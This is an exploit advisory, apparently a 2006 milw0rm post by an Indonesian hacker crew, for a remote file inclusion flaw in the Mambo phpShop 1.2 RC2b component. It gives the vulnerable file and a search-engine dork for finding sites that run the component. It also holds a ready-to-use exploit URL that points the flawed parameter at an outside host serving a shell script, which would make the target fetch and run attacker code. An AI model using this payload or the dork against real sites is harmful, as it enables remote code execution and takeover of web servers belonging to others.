Affected Application: Mambo phpShop v1.2 RC2b
(Mambo CMS Component)
. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
Discoverd/Found by: Charles Nelwan a.k.a Cmaster4
Team: BatamHacker irc.dal.net crew
URL: http://www.batamhacker.info/forum
E-Mail: bugtraq_indo@yahoo.com
. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
Typ: Remote [x] Local [ ]
Remote File Inclusion [x] SQL Injection [ ]
Level: Low [ ] Middle [x] High [ ]
Application: Mambo phpShop
Version: 1.2 RC2b
Vulnerable File: toolbar.phpshop.html.ph
URL: http://www.mambo-phpshop.net or http://www.mamboportal.com/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=category&filecatid=1054
Description: phpShop component for Mambo. A fully featured shop component with IPN support, categories, userhandling, etc.
inurl:"com_phpshop"
. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
http://www.targer.com/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://Senjata.com/tembuspakeshell.txt
Shoutz:
~~~~~~
~ Special Greetz To My BATAMHACKER CREW ON IRC.DAL.NET h4ntu, havicaz, baylaw
~ To All Indonesian Underground Hacker
# milw0rm.com [2006-08-17]